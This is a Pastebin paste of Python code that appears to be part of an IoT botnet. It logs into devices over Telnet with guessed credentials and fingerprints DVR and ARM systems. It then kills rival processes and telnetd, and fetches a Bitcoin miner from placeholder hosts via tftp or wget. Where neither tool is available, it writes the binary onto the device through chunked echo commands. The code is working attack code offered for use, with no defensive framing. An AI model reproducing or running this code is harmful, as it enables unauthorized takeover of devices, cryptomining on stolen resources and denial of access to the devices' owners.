Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- def attempt(self, username, password):
- stage = 0
- try:
- tn = telnetlib.Telnet(self.host, 23, 5)
- tn.read_until("login", 3)
- tn.write(username + "\n")
- tn.read_until("pass", 3)
- tn.write(password + "\n")
- stage = 4
- out = tn.read_until("invalid", 5).lower()
- out = out.translate(None, " \r\n").rstrip().strip()
- if len(out) == 0:
- return 1
- #check if it contains invalid, fail, again or unauthorized
- for fail in failChecks:
- if fail in out:
- return 0
- if "#" not in out and ">" not in out and "$" not in out and "~" not in out:
- return 0
- self.azz = out
- stage = 5
- tn.write("cat /proc/version && echo -ne '\\x64\\x6f\\x6e\\x65'\n")
- procVersion = tn.read_until("done", 2).lower()
- procVersionWorked = "done" in procVersion #irrelevant
- if "dvrdvs" in out or (procVersionWorked and "arm" in procVersion):
- self.killProcesses(tn, ["/var/run/", "/dev/"])
- binaryResult = 2
- if "v5l" in procVersion:
- binaryResult = self.downloadBinary(tn, "/var/run/", "btcminer-arm", "http://<BINARIES>/", "-B -o stratum+tcp://<STRATUM PROXY>:3333")#old ass binary
- else:#is a dvr
- binaryResult = self.downloadBinary(tn, "/var/run/", "btcminer-arm", "http://<BINARIES>/", "-B -o stratum+tcp://<STRATUM PROXY>:3333 -t 4 -q")
- if binaryResult == 0:
- self.killProcesses(tn, ["telnetd"])
- return 2
- else:
- return 0
- return 0 #we didnt infect shit but save it anyways
- except (socket.timeout, socket.error, EOFError):
- if stage >= 4:
- return 0
- return 1
- except Exception, e:
- if stage >= 4:
- return 0
- return 1
- def killProcesses(self, tn, containList):
- tn.write("ps && echo -ne '\\x64\\x6f\\x6e\\x65'\n")#lets just hope we have echo support...
- psResult = tn.read_until("done", 10)#slow ass piece of shit
- tokill = "echo start"
- for containing in containList:
- if containing in psResult:
- splitPs = psResult.replace("\r","").split("\n")
- for psLine in splitPs:
- if containing in psLine:
- for part in psLine.split(" "):
- if part != "":
- tokill = tokill + "; kill -9 "+part
- break
- tokill = tokill + "; echo -ne '\\x64\\x6f\\x6e\\x65'"
- tn.write(tokill+"\n")#kill all illegal processes! ~.~
- psResult = tn.read_until("done", 5)#lets lower from 10 to 5
- def downloadBinary(self, tn, location, arch, web, args=""):
- if location.endswith("/"): #trim / off the end of location (we provide that)
- location = location[:-1]
- if web.endswith("/"): #trim / off the end of web (we provide that)
- web = web[:-1]
- tn.read_until("+!#CLEAN_READS#!+", 0.5)
- echoSupport = True
- if not echoSupport:
- return -1 #there's no point in even trying, this box sucks!
- tn.write("cd %s && echo -ne '\\x64\\x6f\\x6e\\x65'\n" % (location))
- tn.read_until("done", 1)#irrelevant
- tn.write("tftp --help\n")
- tftpSupport = "octets" in tn.read_until("octets", 2)
- tn.read_until("+!#CLEAN_READS#!+", 0.5)
- if tftpSupport: #cool, we have tftp, THIS IS A LITTLE BROKEN AT THE MOMENT
- tn.write("rm *; rm wget-%s; tftp -r wget-%s -g <TFTP SERVER> && echo -ne '\\x64\\x6f\\x6e\\x65'\n" % (arch, arch, arch))
- tftpResult = tn.read_until("done", 10)
- if not "done" in tftpResult:
- print("NOT THERE, RETREAT")
- return -2
- tn.write("chmod u+x wget-%s && ./wget-%s %s/%s && echo -ne '\\x64\\x6f\\x6e\\x65'\n" % (arch, arch, web, arch))
- tftpResult = tn.read_until("done", 10)
- if not "done" in tftpResult:
- return -2
- tn.write("chmod u+x %s && ./%s %s && echo -ne '\\x64\\x6f\\x6e\\x65'\n" % (arch, arch, args));
- tftpResult = tn.read_until("done", 10)
- if not "done" in tftpResult:
- return -2
- tftpWorked = "done" in tftpResult
- if tftpWorked:
- return 0 #exited successfully
- else:
- #clean up and carry on
- tn.write("rm %s; echo -ne '\\x64\\x6f\\x6e\\x65'\n" % arch)
- tn.read_until("done", 1)
- #check if it's already there
- tn.write("./rand0-%s -h\n" % arch)
- writeWorked = "invalid" in tn.read_until("invalid", 2)
- if not writeWorked: #if we already downloaded it, why should we have to dl it again :P
- #looks like we're going to do it the old fashioned way
- binaryResult = self.writeBinary(tn, "wget-%s" % arch, "rand0-%s" % arch, location)
- if binaryResult != 0:
- return 1 #alright then, we have echo support but shit didnt work?
- #download and execute (if true) the binary
- tn.write("./rand0-%s %s/%s && chmod u+x %s && ./%s %s && echo -ne '\\x64\\x6f\\x6e\\x65'\n" % (arch, web, arch, arch, arch, args))
- echoWorked = "done" in tn.read_until("done", 15)
- if echoWorked:
- return 0
- else:
- return 1 #that didnt work, no idea why, but it didnt work.
- return 0
- #writes a binary using the echo -ne 'HEX' method
- def writeBinary(self, tn, localName, filename, location):
- if location.endswith("/"): #trim / off the end of writeTo (we provide that)
- location = location[:-1]
- if localName in binaryLists: #store the binary lists in memory globally
- echoList = binaryLists[localName]
- else:
- echoList = binaryLists[localName] = self.getEchoList(localName, filename, location)#and there's our echoList!
- tn.write("rm -rf %s/%s\n" % (location, filename)) #delete the old one if it exists
- tn.read_until("+!#CLEAN_READS#!+", 0.5)
- for line in echoList: #write the echo list 1 by 1
- tn.write(line + "\n")
- result = tn.read_until("done", 2) #use the done as verification
- if "done" in result:
- continue
- else:
- return -1 #echo not supported or something went wrong
- tn.write("chmod u+x %s/%s && echo -ne '\\x64\\x6f\\x6e\\x65'\n" % (location, filename)) #delete the old one if it exists
- chmodded = "done" in tn.read_until("done", 2)
- if chmodded:
- return 0
- else:
- return -2 #whaaaaaaaaaaa
- return 0
- #get a list of echo commands we need to run
- #by iterating through a file and converting sections of bytes (50 a time)
- #into hex and then putting them into an echo -ne 'HEX' line
- #additionally, we write \\x64\\x6f\\x6e\\x65 (ascii: done) which will allow us to verify that worked after
- def getEchoList(self, localName, outputName, location):
- with open(localName, "rb") as f:
- converted = None
- result = []
- byte = f.read(1)
- i = 0
- current = ""
- while byte != "":
- if i == 51:
- i = 0
- result.append("echo -ne '%s' >> %s/%s && echo -e '\\x64\\x6f\\x6e\\x65'" % (current, location, outputName))#\\x40 is for verification that it worked
- current = ""
- current = current + "\\x"+byte.encode("hex")
- byte = f.read(1)
- i = i + 1
- if len(current) > 0:
- i = 0
- result.append("echo -ne '%s' >> %s/%s && echo -e '\\x64\\x6f\\x6e\\x65'" % (current, location, outputName))#\\x40 is for verification that it worked
- current = ""
- return result
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement